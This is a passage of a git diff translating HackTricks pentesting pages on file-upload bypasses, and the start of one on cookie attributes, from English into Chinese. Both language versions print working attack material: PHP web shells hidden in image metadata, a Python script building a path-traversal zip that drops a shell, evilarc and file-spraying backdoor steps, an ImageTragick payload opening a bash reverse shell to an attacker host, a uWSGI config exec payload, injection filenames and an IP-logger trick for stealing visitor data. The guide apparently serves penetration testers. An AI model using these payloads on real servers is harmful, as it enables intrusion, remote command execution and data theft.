-- Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
-  - [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
+- 通过将**Content-Type** **header**的**值**设置为：_image/png_ , _text/plain , application/octet-stream_来绕过**Content-Type**检查。
+1. Content-Type **字典**：[https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
+- 通过在文件开头添加**真实图像的字节**（混淆_file_命令）来绕过**魔术数字**检查。或者在**元数据**中引入shell：\
+`exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
+`\`或者你也可以**直接在图像中引入有效载荷**：\
+`echo '<?php system($_REQUEST['cmd']); ?>' >> img.png`
+- 如果**压缩被添加到你的图像**，例如使用一些标准的PHP库如[PHP-GD](https://www.php.net/manual/fr/book.image.php)，那么之前的技术将无效。然而，你可以使用**PLTE块** [**在这里定义的技术**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)来插入一些文本，使其**在压缩中存活**。
+- [**Github上的代码**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
+- 网页也可能在**调整图像大小**，例如使用PHP-GD函数`imagecopyresized`或`imagecopyresampled`。然而，你可以使用**IDAT块** [**在这里定义的技术**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)来插入一些文本，使其**在压缩中存活**。
+- [**Github上的代码**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
+- 另一种制作**在图像调整大小中存活的有效载荷**的技术，使用PHP-GD函数`thumbnailImage`。然而，你可以使用**tEXt块** [**在这里定义的技术**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html)来插入一些文本，使其**在压缩中存活**。
+- [**Github上的代码**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
 
-### Other Tricks to check
+### 其他检查技巧
 
-- Find a vulnerability to **rename** the file already uploaded (to change the extension).
-- Find a **Local File Inclusion** vulnerability to execute the backdoor.
-- **Possible Information disclosure**:
-  1. Upload **several times** (and at the **same time**) the **same file** with the **same name**
-  2. Upload a file with the **name** of a **file** or **folder** that **already exists**
-  3. Uploading a file with **“.”, “..”, or “…” as its name**. For instance, in Apache in **Windows**, if the application saves the uploaded files in “/www/uploads/” directory, the “.” filename will create a file called “uploads” in the “/www/” directory.
-  4. Upload a file that may not be deleted easily such as **“…:.jpg”** in **NTFS**. (Windows)
-  5. Upload a file in **Windows** with **invalid characters** such as `|<>*?”` in its name. (Windows)
-  6. Upload a file in **Windows** using **reserved** (**forbidden**) **names** such as CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
-- Try also to **upload an executable** (.exe) or an **.html** (less suspicious) that **will execute code** when accidentally opened by victim.
+- 找到一个**重命名**已上传文件的漏洞（以更改扩展名）。
+- 找到一个**本地文件包含**漏洞以执行后门。
+- **可能的信息泄露**：
+1. **多次**（并且在**同一时间**）上传**同一文件**，使用**相同的名称**
+2. 上传一个**已经存在的**文件或**文件夹**的**名称**的文件
+3. 上传一个文件，其名称为**“.”、 “..”或“…”**。例如，在Apache的**Windows**中，如果应用程序将上传的文件保存在“/www/uploads/”目录中，则“.”文件名将在“/www/”目录中创建一个名为“uploads”的文件。
+4. 上传一个可能不容易被删除的文件，例如**“…:.jpg”**在**NTFS**中。（Windows）
+5. 在**Windows**中上传一个文件，其名称中包含**无效字符**，例如`|<>*?”`。（Windows）
+6. 在**Windows**中上传一个文件，使用**保留**（**禁止**）**名称**，例如CON、PRN、AUX、NUL、COM1、COM2、COM3、COM4、COM5、COM6、COM7、COM8、COM9、LPT1、LPT2、LPT3、LPT4、LPT5、LPT6、LPT7、LPT8和LPT9。
+- 还可以尝试**上传一个可执行文件**（.exe）或一个**.html**（不太可疑），当受害者意外打开时**将执行代码**。
 
-### Special extension tricks
+### 特殊扩展名技巧
 
-If you are trying to upload files to a **PHP server**, [take a look at the **.htaccess** trick to execute code](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess).\
-If you are trying to upload files to an **ASP server**, [take a look at the **.config** trick to execute code](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files).
+如果你尝试将文件上传到**PHP服务器**， [查看**.htaccess**技巧以执行代码](https://book.hacktricks.xyz/pentesting/pentesting-web/php-tricks-esp#code-execution-via-httaccess)。\
+如果你尝试将文件上传到**ASP服务器**， [查看**.config**技巧以执行代码](../../network-services-pentesting/pentesting-web/iis-internet-information-services.md#execute-config-files)。
 
-The `.phar` files are like the `.jar` for java, but for php, and can be **used like a php file** (executing it with php, or including it inside a script...)
+`.phar`文件类似于Java的`.jar`，但用于PHP，可以**像PHP文件一样使用**（通过PHP执行或在脚本中包含它...）
 
-The `.inc` extension is sometimes used for php files that are only used to **import files**, so, at some point, someone could have allow **this extension to be executed**.
+`.inc`扩展名有时用于仅用于**导入文件**的PHP文件，因此，在某些时候，可能有人允许**此扩展名被执行**。
 
 ## **Jetty RCE**
 
-If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
+如果你可以将XML文件上传到Jetty服务器，你可以获得[RCE，因为**新的\*.xml和\*.war会被自动处理**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**。**因此，如下图所示，将XML文件上传到`$JETTY_BASE/webapps/`并期待shell！
 
 ![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>)
 
 ## **uWSGI RCE**
 
-For a detailed exploration of this vulnerability check the original research: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
+有关此漏洞的详细探索，请查看原始研究：[uWSGI RCE利用](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html)。
 
-Remote Command Execution (RCE) vulnerabilities can be exploited in uWSGI servers if one has the capability to modify the `.ini` configuration file. uWSGI configuration files leverage a specific syntax to incorporate "magic" variables, placeholders, and operators. Notably, the '@' operator, utilized as `@(filename)`, is designed to include the contents of a file. Among the various supported schemes in uWSGI, the "exec" scheme is particularly potent, allowing the reading of data from a process's standard output. This feature can be manipulated for nefarious purposes such as Remote Command Execution or Arbitrary File Write/Read when a `.ini` configuration file is processed.
-
-Consider the following example of a harmful `uwsgi.ini` file, showcasing various schemes:
+如果能够修改`.ini`配置文件，则可以在uWSGI服务器中利用远程命令执行（RCE）漏洞。uWSGI配置文件利用特定语法来包含“魔术”变量、占位符和操作符。值得注意的是，`@`操作符，作为`@(filename)`使用，旨在包含文件的内容。在uWSGI支持的各种方案中，“exec”方案特别强大，允许从进程的标准输出读取数据。当处理`.ini`配置文件时，可以利用此功能进行恶意目的，例如远程命令执行或任意文件写入/读取。
 
+考虑以下有害的`uwsgi.ini`文件示例，展示各种方案：
 ```ini
 [uwsgi]
 ; read from a symbol
@@ -133,16 +132,14 @@ extra = @(exec://curl http://collaborator-unique-host.oastify.com)
 ; call a function returning a char *
 characters = @(call://uwsgi_func)
 ```
+有效负载的执行发生在配置文件解析期间。为了激活和解析配置，uWSGI 进程必须被重启（可能是在崩溃后或由于拒绝服务攻击）或文件必须设置为自动重载。如果启用了自动重载功能，在检测到更改时，会在指定的时间间隔内重新加载文件。
 
-The execution of the payload occurs during the parsing of the configuration file. For the configuration to be activated and parsed, the uWSGI process must either be restarted (potentially after a crash or due to a Denial of Service attack) or the file must be set to auto-reload. The auto-reload feature, if enabled, reloads the file at specified intervals upon detecting changes.
+理解 uWSGI 配置文件解析的宽松性质至关重要。具体来说，讨论的有效负载可以插入到二进制文件中（例如图像或 PDF），进一步扩大潜在利用的范围。
 
-It's crucial to understand the lax nature of uWSGI's configuration file parsing. Specifically, the discussed payload can be inserted into a binary file (such as an image or PDF), further broadening the scope of potential exploitation.
-
-## **wget File Upload/SSRF Trick**
-
-In some occasions you may find that a server is using **`wget`** to **download files** and you can **indicate** the **URL**. In these cases, the code may be checking that the extension of the downloaded files is inside a whitelist to assure that only allowed files are going to be downloaded. However, **this check can be bypassed.**\
-The **maximum** length of a **filename** in **linux** is **255**, however, **wget** truncate the filenames to **236** characters. You can **download a file called "A"\*232+".php"+".gif"**, this filename will **bypass** the **check** (as in this example **".gif"** is a **valid** extension) but `wget` will **rename** the file to **"A"\*232+".php"**.
+## **wget 文件上传/SSRF 技巧**
 
+在某些情况下，您可能会发现服务器使用 **`wget`** 来 **下载文件**，并且您可以 **指示** **URL**。在这些情况下，代码可能会检查下载文件的扩展名是否在白名单中，以确保仅下载允许的文件。然而，**此检查可以被绕过。**\
+**linux** 中 **文件名** 的 **最大** 长度为 **255**，但是 **wget** 将文件名截断为 **236** 个字符。您可以 **下载一个名为 "A"\*232+".php"+".gif"** 的文件，这个文件名将 **绕过** **检查**（因为在这个例子中 **".gif"** 是一个 **有效** 扩展名），但 `wget` 将 **重命名** 文件为 **"A"\*232+".php"**。
 ```bash
 #Create file and HTTP server
 echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
@@ -165,163 +162,154 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
 
 2020-06-13 03:14:06 (1.96 MB/s) - ‘AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php’ saved [10/10]
 ```
+注意，您可能正在考虑的**另一个选项**是使**HTTP服务器重定向到另一个文件**，因此初始URL将绕过检查，然后wget将下载重定向的文件并使用新名称。这**不会工作**，**除非**wget与**参数**`--trust-server-names`一起使用，因为**wget将下载重定向页面，并使用原始URL中指示的文件名称**。
 
-Note that **another option** you may be thinking of to bypass this check is to make the **HTTP server redirect to a different file**, so the initial URL will bypass the check by then wget will download the redirected file with the new name. This **won't work** **unless** wget is being used with the **parameter** `--trust-server-names` because **wget will download the redirected page with the name of the file indicated in the original URL**.
+## 工具
 
-## Tools
+- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) 是一个强大的工具，旨在帮助Pentesters和Bug Hunters测试文件上传机制。它利用各种漏洞赏金技术简化识别和利用漏洞的过程，确保对Web应用程序进行全面评估。
 
-- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
+## 从文件上传到其他漏洞
 
-## From File upload to other vulnerabilities
+- 将**filename**设置为`../../../tmp/lol.png`并尝试实现**路径遍历**
+- 将**filename**设置为`sleep(10)-- -.jpg`，您可能能够实现**SQL注入**
+- 将**filename**设置为`<svg onload=alert(document.domain)>`以实现XSS
+- 将**filename**设置为`; sleep 10;`以测试一些命令注入（更多[命令注入技巧在这里](../command-injection.md)）
+- [**XSS**在图像（svg）文件上传中](../xss-cross-site-scripting/#xss-uploading-files-svg)
+- **JS**文件**上传** + **XSS** = [**服务工作者**利用](../xss-cross-site-scripting/#xss-abusing-service-workers)
+- [**XXE在svg上传中**](../xxe-xee-xml-external-entity.md#svg-file-upload)
+- [**通过上传svg文件的开放重定向**](../open-redirect.md#open-redirect-uploading-svg-files)
+- 尝试来自[**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)的**不同svg有效负载**
+- [著名的**ImageTrick**漏洞](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
+- 如果您可以**指示Web服务器从URL捕获图像**，您可以尝试利用[SSRF](../ssrf-server-side-request-forgery/)。如果此**图像**将被**保存**在某个**公共**网站上，您还可以指示来自[https://iplogger.org/invisible/](https://iplogger.org/invisible/)的URL并**窃取每个访问者的信息**。
+- [**XXE和CORS**绕过PDF-Adobe上传](pdf-upload-xxe-and-cors-bypass.md)
+- 特别制作的PDF以实现XSS：[以下页面展示如何**注入PDF数据以获得JS执行**](../xss-cross-site-scripting/pdf-injection.md)。如果您可以上传PDF，您可以准备一些将执行任意JS的PDF，遵循给定的指示。
+- 上传\[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt))内容以检查服务器是否有任何**防病毒**
+- 检查上传文件是否有任何**大小限制**
 
-- Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
-- Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection**
-- Set **filename** to `<svg onload=alert(document.domain)>` to achieve a XSS
-- Set **filename** to `; sleep 10;` to test some command injection (more [command injections tricks here](../command-injection.md))
-- [**XSS** in image (svg) file upload](../xss-cross-site-scripting/#xss-uploading-files-svg)
-- **JS** file **upload** + **XSS** = [**Service Workers** exploitation](../xss-cross-site-scripting/#xss-abusing-service-workers)
-- [**XXE in svg upload**](../xxe-xee-xml-external-entity.md#svg-file-upload)
-- [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
-- Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)\*\*\*\*
-- [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
-- If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
-- [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
-- Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
-- Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus**
-- Check if there is any **size limit** uploading files
+以下是您可以通过上传实现的前10个事项（来自[这里](https://twitter.com/SalahHasoneh1/status/1281274120395685889)）：
 
-Here’s a top 10 list of things that you can achieve by uploading (from [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
+1. **ASP / ASPX / PHP5 / PHP / PHP3**：Webshell / RCE
+2. **SVG**：存储的XSS / SSRF / XXE
+3. **GIF**：存储的XSS / SSRF
+4. **CSV**：CSV注入
+5. **XML**：XXE
+6. **AVI**：LFI / SSRF
+7. **HTML / JS**：HTML注入 / XSS / 开放重定向
+8. **PNG / JPEG**：像素洪水攻击（DoS）
+9. **ZIP**：通过LFI / DoS的RCE
+10. **PDF / PPTX**：SSRF / BLIND XXE
 
-1. **ASP / ASPX / PHP5 / PHP / PHP3**: Webshell / RCE
-2. **SVG**: Stored XSS / SSRF / XXE
-3. **GIF**: Stored XSS / SSRF
-4. **CSV**: CSV injection
-5. **XML**: XXE
-6. **AVI**: LFI / SSRF
-7. **HTML / JS** : HTML injection / XSS / Open redirect
-8. **PNG / JPEG**: Pixel flood attack (DoS)
-9. **ZIP**: RCE via LFI / DoS
-10. **PDF / PPTX**: SSRF / BLIND XXE
-
-#### Burp Extension
+#### Burp扩展
 
 {% embed url="https://github.com/portswigger/upload-scanner" %}
 
-## Magic Header Bytes
+## 魔法头字节
 
-- **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["`
-- **JPG**: `"\xff\xd8\xff"`
+- **PNG**：`"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03["`
+- **JPG**：`"\xff\xd8\xff"`
 
-Refer to [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) for other filetypes.
+请参阅[https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures)以获取其他文件类型。
 
-### Zip/Tar File Automatically decompressed Upload
+### Zip/Tar文件自动解压上传
 
-If you can upload a ZIP that is going to be decompressed inside the server, you can do 2 things:
+如果您可以上传一个将在服务器内部解压的ZIP，您可以做两件事：
 
-#### Symlink
-
-Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
+#### 符号链接
 
+上传一个包含软链接到其他文件的链接，然后，访问解压的文件时，您将访问链接的文件：
 ```
 ln -s ../../../index.php symindex.txt
 zip --symlinks test.zip symindex.txt
 tar -cvf test.tar symindex.txt
 ```
+### 在不同文件夹中解压
 
-### Decompress in different folders
-
-The unexpected creation of files in directories during decompression is a significant issue. Despite initial assumptions that this setup might guard against OS-level command execution through malicious file uploads, the hierarchical compression support and directory traversal capabilities of the ZIP archive format can be exploited. This allows attackers to bypass restrictions and escape secure upload directories by manipulating the decompression functionality of the targeted application.
-
-An automated exploit to craft such files is available at [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). The utility can be used as shown:
+在解压过程中意外创建文件在目录中是一个重大问题。尽管最初假设这种设置可能会防止通过恶意文件上传进行操作系统级命令执行，但ZIP归档格式的层次压缩支持和目录遍历能力可以被利用。这使得攻击者能够绕过限制，通过操纵目标应用程序的解压功能逃离安全上传目录。
 
+一个自动化的利用工具可以在 [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc) 找到。该工具的使用方法如下：
 ```python
 # Listing available options
 python2 evilarc.py -h
 # Creating a malicious archive
 python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
 ```
+此外，**使用 evilarc 的符号链接技巧**是一个选项。如果目标是针对像 `/flag.txt` 这样的文件，则应在您的系统中创建指向该文件的符号链接。这确保了 evilarc 在操作过程中不会遇到错误。
 
-Additionally, the **symlink trick with evilarc** is an option. If the objective is to target a file like `/flag.txt`, a symlink to that file should be created in your system. This ensures that evilarc does not encounter errors during its operation.
-
-Below is an example of Python code used to create a malicious zip file:
-
+下面是用于创建恶意 zip 文件的 Python 代码示例：
 ```python
 #!/usr/bin/python
 import zipfile
 from io import BytesIO
 
 def create_zip():
-    f = BytesIO()
-    z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
-    z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
-    z.writestr('otherfile.xml', 'Content of the file')
-    z.close()
-    zip = open('poc.zip','wb')
-    zip.write(f.getvalue())
-    zip.close()
+f = BytesIO()
+z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)
+z.writestr('../../../../../var/www/html/webserver/shell.php', '<?php echo system($_REQUEST["cmd"]); ?>')
+z.writestr('otherfile.xml', 'Content of the file')
+z.close()
+zip = open('poc.zip','wb')
+zip.write(f.getvalue())
+zip.close()
 
 create_zip()
 ```
+**利用压缩进行文件喷洒**
 
-**Abusing compression for file spraying**
+有关更多详细信息，请**查看原始帖子**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
 
-For further details **check the original post in**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
+1.  **创建 PHP Shell**: PHP 代码被编写以执行通过 `$_REQUEST` 变量传递的命令。
 
-1.  **Creating a PHP Shell**: PHP code is written to execute commands passed through the `$_REQUEST` variable.
+```php
+<?php
+if(isset($_REQUEST['cmd'])){
+$cmd = ($_REQUEST['cmd']);
+system($cmd);
+}?>
+```
 
-    ```php
-    <?php
-    if(isset($_REQUEST['cmd'])){
-        $cmd = ($_REQUEST['cmd']);
-        system($cmd);
-    }?>
-    ```
+2.  **文件喷洒和压缩文件创建**: 创建多个文件，并组装一个包含这些文件的 zip 存档。
 
-2.  **File Spraying and Compressed File Creation**: Multiple files are created and a zip archive is assembled containing these files.
+```bash
+root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
+root@s2crew:/tmp# zip cmd.zip xx*.php
+```
 
-    ```bash
-    root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
-    root@s2crew:/tmp# zip cmd.zip xx*.php
-    ```
+3.  **使用十六进制编辑器或 vi 进行修改**: 使用 vi 或十六进制编辑器更改 zip 内部文件的名称，将 "xxA" 更改为 "../" 以遍历目录。
 
-3.  **Modification with a Hex Editor or vi**: The names of the files inside the zip are altered using vi or a hex editor, changing "xxA" to "../" to traverse directories.
-
-    ```bash
-    :set modifiable
-    :%s/xxA/..\//g
-    :x!
-    ```
+```bash
+:set modifiable
+:%s/xxA/..\//g
+:x!
+```
 
 ## ImageTragic
 
-Upload this content with an image extension to exploit the vulnerability **(ImageMagick , 7.0.1-1)** (form the [exploit](https://www.exploit-db.com/exploits/39767))
-
+将此内容与图像扩展名一起上传以利用该漏洞 **(ImageMagick , 7.0.1-1)** (来自 [exploit](https://www.exploit-db.com/exploits/39767))
 ```
 push graphic-context
 viewbox 0 0 640 480
 fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
 pop graphic-context
 ```
+## 在PNG中嵌入PHP Shell
 
-## Embedding PHP Shell on PNG
+在PNG文件的IDAT块中嵌入PHP shell可以有效绕过某些图像处理操作。PHP-GD中的`imagecopyresized`和`imagecopyresampled`函数在此上下文中特别相关，因为它们通常用于调整和重新采样图像。嵌入的PHP shell能够不受这些操作影响，这在某些用例中是一个显著的优势。
 
-Embedding a PHP shell in the IDAT chunk of a PNG file can effectively bypass certain image processing operations. The functions `imagecopyresized` and `imagecopyresampled` from PHP-GD are particularly relevant in this context, as they are commonly used for resizing and resampling images, respectively. The ability of the embedded PHP shell to remain unaffected by these operations is a significant advantage for certain use cases.
+以下文章提供了对该技术的详细探讨，包括其方法论和潜在应用：["在PNG IDAT块中编码Web Shells"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)。该资源提供了对该过程及其影响的全面理解。
 
-A detailed exploration of this technique, including its methodology and potential applications, is provided in the following article: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). This resource offers a comprehensive understanding of the process and its implications.
+更多信息在：[https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
 
-More information in: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
+## 多语言文件
 
-## Polyglot Files
+多语言文件在网络安全中作为一种独特工具，像变色龙一样可以同时有效地存在于多种文件格式中。一个有趣的例子是[GIFAR](https://en.wikipedia.org/wiki/Gifar)，它既可以作为GIF也可以作为RAR档案。这样的文件并不限于这种配对；像GIF和JS或PPT和JS的组合也是可行的。
 
-Polyglot files serve as a unique tool in cybersecurity, acting as chameleons that can validly exist in multiple file formats simultaneously. An intriguing example is a [GIFAR](https://en.wikipedia.org/wiki/Gifar), a hybrid that functions both as a GIF and a RAR archive. Such files aren't limited to this pairing; combinations like GIF and JS or PPT and JS are also feasible.
+多语言文件的核心实用性在于它们能够绕过基于类型的安全措施。各种应用中的常见做法是仅允许某些文件类型上传——如JPEG、GIF或DOC——以降低潜在有害格式（例如JS、PHP或Phar文件）带来的风险。然而，多语言文件通过符合多种文件类型的结构标准，可以悄然绕过这些限制。
 
-The core utility of polyglot files lies in their capacity to circumvent security measures that screen files based on type. Common practice in various applications entails permitting only certain file types for upload—like JPEG, GIF, or DOC—to mitigate the risk posed by potentially harmful formats (e.g., JS, PHP, or Phar files). However, a polyglot, by conforming to the structural criteria of multiple file types, can stealthily bypass these restrictions.
+尽管它们具有适应性，但多语言文件确实面临限制。例如，虽然一个多语言文件可能同时包含一个PHAR文件（PHp ARchive）和一个JPEG，但其上传的成功可能取决于平台的文件扩展名政策。如果系统对允许的扩展名要求严格，仅仅是多语言文件的结构双重性可能不足以保证其上传。
 
-Despite their adaptability, polyglots do encounter limitations. For instance, while a polyglot might simultaneously embody a PHAR file (PHp ARchive) and a JPEG, the success of its upload might hinge on the platform's file extension policies. If the system is stringent about allowable extensions, the mere structural duality of a polyglot may not suffice to guarantee its upload.
+更多信息在：[https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
 
-More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
-
-## References
+## 参考文献
 
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files)
 - [https://github.com/modzero/mod0BurpUploadScanner](https://github.com/modzero/mod0BurpUploadScanner)
@@ -332,9 +320,8 @@ More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-frie
 
 <figure><img src="../../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘！** (_要求流利的波兰语书写和口语能力_).
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md b/src/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md
index 3bc15ed15..5456f8397 100644
--- a/src/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md
+++ b/src/pentesting-web/file-upload/pdf-upload-xxe-and-cors-bypass.md
@@ -1,8 +1,7 @@
-# PDF Upload - XXE and CORS bypass
+# PDF 上传 - XXE 和 CORS 绕过
 
 {{#include ../../banners/hacktricks-training.md}}
 
-**Check [https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html](https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html)**
+**检查 [https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html](https://insert-script.blogspot.com/2014/12/multiple-pdf-vulnerabilites-text-and.html)**
 
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/hacking-with-cookies/README.md b/src/pentesting-web/hacking-with-cookies/README.md
index b6b527f10..d170aa167 100644
--- a/src/pentesting-web/hacking-with-cookies/README.md
+++ b/src/pentesting-web/hacking-with-cookies/README.md
@@ -4,35 +4,35 @@
 
 ## Cookie Attributes
 
-Cookies come with several attributes that control their behavior in the user's browser. Here’s a rundown of these attributes in a more passive voice:
+Cookies 具有几个属性，控制它们在用户浏览器中的行为。以下是这些属性的简要说明：
 
 ### Expires and Max-Age
 
-The expiry date of a cookie is determined by the `Expires` attribute. Conversely, the `Max-age` attribute defines the time in seconds until a cookie is deleted. **Opt for `Max-age` as it reflects more modern practices.**
+Cookie 的过期日期由 `Expires` 属性决定。相反，`Max-age` 属性定义了在删除 cookie 之前的秒数。**选择 `Max-age`，因为它反映了更现代的做法。**
 
 ### Domain
 
-The hosts to receive a cookie are specified by the `Domain` attribute. By default, this is set to the host that issued the cookie, not including its subdomains. However, when the `Domain` attribute is explicitly set, it encompasses subdomains as well. This makes the specification of the `Domain` attribute a less restrictive option, useful for scenarios where cookie sharing across subdomains is necessary. For instance, setting `Domain=mozilla.org` makes cookies accessible on its subdomains like `developer.mozilla.org`.
+接收 cookie 的主机由 `Domain` 属性指定。默认情况下，这设置为发出 cookie 的主机，不包括其子域。然而，当 `Domain` 属性被明确设置时，它也包括子域。这使得 `Domain` 属性的指定成为一个不那么严格的选项，适用于需要跨子域共享 cookie 的场景。例如，设置 `Domain=mozilla.org` 使得在其子域如 `developer.mozilla.org` 上可以访问 cookie。
 
 ### Path
 
-A specific URL path that must be present in the requested URL for the `Cookie` header to be sent is indicated by the `Path` attribute. This attribute considers the `/` character as a directory separator, allowing for matches in subdirectories as well.
+`Path` 属性指示必须在请求的 URL 中存在的特定 URL 路径，以便发送 `Cookie` 头。此属性将 `/` 字符视为目录分隔符，允许在子目录中匹配。
 
 ### Ordering Rules
 
-When two cookies bear the same name, the one chosen for sending is based on:
+当两个 cookie 具有相同的名称时，选择发送的 cookie 基于：
 
-- The cookie matching the longest path in the requested URL.
-- The most recently set cookie if the paths are identical.
+- 与请求的 URL 中最长路径匹配的 cookie。
+- 如果路径相同，则选择最近设置的 cookie。
 
 ### SameSite
 
-- The `SameSite` attribute dictates whether cookies are sent on requests originating from third-party domains. It offers three settings:
